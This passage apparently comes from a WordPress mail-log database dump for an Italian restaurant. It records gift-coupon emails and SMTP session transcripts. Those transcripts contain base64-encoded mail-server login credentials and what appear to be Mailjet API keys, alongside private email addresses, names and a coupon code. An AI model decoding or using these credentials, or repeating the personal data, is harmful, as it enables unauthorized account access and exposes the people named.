underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(21995,1156,'original_headers','Bcc:marcello.manduchi@hotmail.it'),(21996,1156,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:36 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<Filos4@libero.it>\r\n250 Accepted\r\nRCPT TO:<marcello.manduchi@hotmail.it>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: Filos4@libero.it\r\nMessage-Id: <46b757d700650b0468ccd8f87ecaafab@ristorantesolymar.it>\r\nSubject: Sol Y Mar, ristorante a Riccione\r\nDate: Mon, 26 Oct 2020 08:52:36 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html>=0A<head><meta http-equiv=3D\"Content-Type\" conte=\r\nnt=3D\"text/html; charset=3Dutf-8\"></head>=0A<body style=3D\"padding: 0;\">=\r\n=0A<table class=3D\"email-container\" border=3D\"0\" width=3D\"600px;\" cellsp=\r\nacing=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" style=3D\"margin: 0 auto;=\r\n background-color: #ff9898; border-spacing: 10px;\">=0D=0A<tbody>=0D=0A<t=\r\nr>=0D=0A<td style=3D\"padding: 5px;\">=0D=0A<table class=3D\"email-containe=\r\nr\" border=3D\"0\" cellspacing=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" sty=\r\nle=3D\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 1=\r\n0px 0px; border: 2px dashed #ffffff;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td s=\r\ntyle=3D\"padding: 10px 0; text-align: left;\"><a style=3D\"font-weight: nor=\r\nmal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\r\n=3D\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar=\r\n-logo-150.png\" width=3D\"200px\" height=3D\"150px\" style=3D\"border: none; d=\r\nisplay: inline-block; font-size: 14px; font-weight: bold; height: auto;=\r\n outline: none; text-decoration: none; text-transform: capitalize; verti=\r\ncal-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>=0D=0A=\r\n<td style=3D\"padding: 10px 0; text-align: center;\"><img src=3D\"https://w=\r\nww.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=3D\"b=\r\norder: none; display: inline-block; font-size: 14px; font-weight: bold;=\r\n height: auto; outline: none; text-decoration: none; text-transform: cap=\r\nitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"><=\r\n/td>=0D=0A</tr>=0D=0A<tr>=0D=0A<td class=3D\"img-block\" style=3D\"text-ali=\r\ngn: center; padding: 2px 0px;\"></td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</tab=\r\nle>=0D=0A</td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=0D=0A=C2=A0=0D=0A<=\r\ntable class=3D\"email-container\" border=3D\"0\" width=3D\"600px;\" cellspacin=\r\ng=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" style=3D\"background-color: #f=\r\nfffff; margin: auto;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td bgcolor=3D\"#fffff=\r\nf\" style=3D\"text-align: center; font-family: sans-serif; font-size: 15px=\r\n; line-height: 20px; color: #555555;\"></td>=0D=0A</tr>=0D=0A<!-- -->=0D=\r\n=0A<tr>=0D=0A<td align=3D\"center\" valign=3D\"top\" bgcolor=3D\"#ffffff\" sty=\r\nle=3D\"padding: 15px;\">=0D=0A<table border=3D\"0\" width=3D\"100%;\" cellspac=\r\ning=3D\"0\" cellpadding=3D\"0\" style=3D\"background-color: #ffffff;\">=0D=0A<=\r\ntbody>=0D=0A<tr>=0D=0A<td class=3D\"stack-column-center\" style=3D\"vertica=\r\nl-align: top; width: 50%;\">=0D=0A<table border=3D\"0\" cellspacing=3D\"0\" c=\r\nellpadding=3D\"0\" style=3D\"background-color: #ffffff;\">=0D=0A<tbody>=0D=\r\n=0A<tr>=0D=0A<td style=3D\"padding: 10px; text-align: center; width: 50%;=\r\n\"><img src=3D\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_br=\r\nowse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=3D\"100%\" style=3D\"=\r\nborder: none; display: inline-block; font-size: 14px; font-weight: bold;=\r\n height: auto; outline: none; text-decoration: none; text-transform: cap=\r\nitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"><=\r\n/td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=0D=0A</td>=0D=0A<td class=3D=\r\n\"stack-column-center\" style=3D\"vertical-align: top;\">=0D=0A<table border=\r\n=3D\"0\" width=3D\"100%\" cellspacing=3D\"0\" cellpadding=3D\"0\" style=3D\"backg=\r\nround-color: #ffffff;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td class=3D\"center-=\r\non-narrow\" style=3D\"font-family: sans-serif; font-size: 15px; line-heigh=\r\nt: 20px; color: #555555; padding: 10px; text-align: left; word-break: br=\r\neak-word;\">=0D=0A<p style=3D\"min-height: 180px;\">Ti doniamo un piccolo m=\r\nomento di piacere, per ringraziarti del tempo e delle cure che ci hai de=\r\ndicato in questi mesi. Grazie zio!</p>=0D=0A</td>=0D=0A</tr>=0D=0A<tr>=\r\n=0D=0A<td style=3D\"padding: 0 10px; color: #373737;\">=0A<span style=3D\"f=\r\nloat: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span styl=\r\ne=3D\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo=\r\n Manduchi</span>=0A</td>=0D=0A</tr>=0D=0A<tr>=0D=0A<td style=3D\"padding:=\r\n 5px 10px; color: #373737;\">=0A<span style=3D\"float: left; padding: 0 3%=\r\n 0 0; text-align: right;\">A :</span><span style=3D\"width: 75%; float: le=\r\nft; word-break: break-all;\">Filippo Saulle</span>=0A</td>=0D=0A</tr>=0D=\r\n=0A<tr>=0D=0A<td style=3D\"padding: 5px 10px; color: #373737;\">=0D=0A<h3=\r\n style=3D\"color: #557da1; display: block; font-weight: bold; line-height=\r\n: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-fami=\r\nly: Arial, Helvetica, sans-serif;\"><span class=3D\"woocommerce-Price-amou=\r\nnt amount\"><bdi>100,00<span class=3D\"woocommerce-Price-currencySymbol\">=\r\n=E2=82=AC</span></bdi></span></h3>=0D=0A</td>=0D=0A</tr>=0D=0A</tbody>=\r\n=0D=0A</table>=0D=0A</td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=0D=0A</=\r\ntd>=0D=0A</tr>=0D=0A<tr>=0D=0A<td valign=3D\"middle\" style=3D\"text-align:=\r\n center; background-color: #ffd5d5; padding: 10px;\">=0D=0A<div>=0D=0A<ta=\r\nble border=3D\"0\" width=3D\"100%\" cellspacing=3D\"0\" cellpadding=3D\"0\" alig=\r\nn=3D\"center\" style=3D\"background-color: #ffffff; border-spacing: 20px; b=\r\norder: 2px dashed #ffffff;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td valign=3D\"m=\r\niddle\" style=3D\"padding: 10px 0px; font-family: sans-serif; line-height:=\r\n 20px; color: #ff9898; text-align: center; border: 3px;\">=0D=0A<h2 style=\r\n=3D\"color: #557da1; display: block; font-weight: bold; line-height: 130%=\r\n; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-se=\r\nrif; font-size: 15px; text-align: center;\">Codice Coupon</h2>=0D=0A<p st=\r\nyle=3D\"font-size: 25px; font-weight: bold; margin: 0px; text-align: cent=\r\ner;\"><img class=3D\"mwb_wgm_coupon_img\" id=3D\"1603656130www.ristorantesol=\r\nymar.it\" src=3D\"https://www.ristorantesolymar.it/wp-content/uploads/qrco=\r\nde_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=3D\"border: none;=\r\n display: inline-block; font-size: 14px; font-weight: bold; height: auto=\r\n; outline: none; text-decoration: none; text-transform: capitalize; vert=\r\nical-align: middle; margin-right: 10px; max-width: 100%;\"></p>=0D=0A<spa=\r\nn style=3D\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Sca=\r\ndenza. 23/04/2021)</span>=0A</td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=\r\n=0D=0A</div>=0A</td>=0D=0A</tr>=0D=0A<tr>=0D=0A<td style=3D\"text-align:=\r\n center; padding: 15px; color: #ffffff; background-color: #ff9898; font-=\r\nsize: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolam=\r\nento dell\'utilizzo dei Coupon / Buoni regali sul <a href=3D\"https://www.=\r\nristorantesolymar.it/info-privacy/\" style=3D\"color: #557da1; font-weight=\r\n: normal; text-decoration: underline;\">sito</a>=0A</td>=0D=0A</tr>=0D=0A=\r\n</tbody>=0D=0A</table>=0A</body>=0A</html>=0A\r\n.\r\n250 OK id=1kWyF2-0007rL-CH\r\n'),(21997,1157,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21998,1157,'success',''),(21999,1157,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22000,1157,'to_header','marcello.manduchi@hotmail.it'),(22001,1157,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22002,1157,'original_to','[\"marcello.manduchi@hotmail.it\"]'),(22003,1157,'original_subject','Un buono regale per te - Sol Y Mar'),(22004,1157,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n'),(22005,1157,'original_headers','Content-Type: text/html\r\n'),(22006,1157,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:34 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22007,1158,'solution','Not found, check status column for more info.'),(22008,1158,'success','1'),(22009,1158,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22010,1158,'to_header','marcello.manduchi@hotmail.it'),(22011,1158,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22012,1158,'original_to','[\"marcello.manduchi@hotmail.it\"]'),(22013,1158,'original_subject','Un buono regale per te - Sol Y Mar'),(22014,1158,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n'),(22015,1158,'original_headers','Content-Type: text/html\r\n'),(22016,1158,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:40 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<marcello.manduchi@hotmail.it>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: marcello.manduchi@hotmail.it\r\nMessage-Id: <ce6150958e45e6b52b1ae9034efa5214@ristorantesolymar.it>\r\nSubject: Un buono regale per te - Sol Y Mar\r\nDate: Mon, 26 Oct 2020 08:52:40 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html>=0A<head><meta http-equiv=3D\"Content-Type\" conte=\r\nnt=3D\"text/html; charset=3Dutf-8\"></head>=0A<body style=3D\"padding: 0;\">=\r\n<p>Il coupon che hai acquistato =C3=A8 stato inviato via email all\'indir=\r\nizzo destinatario che hai specificato durante l\'ordine.</p></body>=0A</h=\r\ntml>=0A\r\n.\r\n250 OK id=1kWyF6-0007s7-Eb\r\n'),(22017,1159,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22018,1159,'success',''),(22019,1159,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22020,1159,'to_header','Filos4@libero.it'),(22021,1159,'bcc_header','marcello.manduchi@hotmail.it'),(22022,1159,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22023,1159,'original_to','[\"Filos4@libero.it\"]'),(22024,1159,'original_subject','Sol Y Mar, ristorante a Riccione'),(22025,1159,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656083www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(22026,1159,'original_headers','Bcc:marcello.manduchi@hotmail.it'),(22027,1159,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:42 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22028,1160,'solution','Not found, check status column for more info.'),(22029,1160,'success','1'),(22030,1160,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22031,1160,'to_header','Filos4@libero.it'),(22032,1160,'bcc_header','marcello.manduchi@hotmail.it'),(22033,1160,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22034,1160,'original_to','[\"Filos4@libero.it\"]'),(22035,1160,'original_subject','Sol Y Mar, ristorante a Riccione'),(22036,1160,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656083www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(22037,1160,'original_headers','Bcc:marcello.manduchi@hotmail.it'),(22038,1160,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 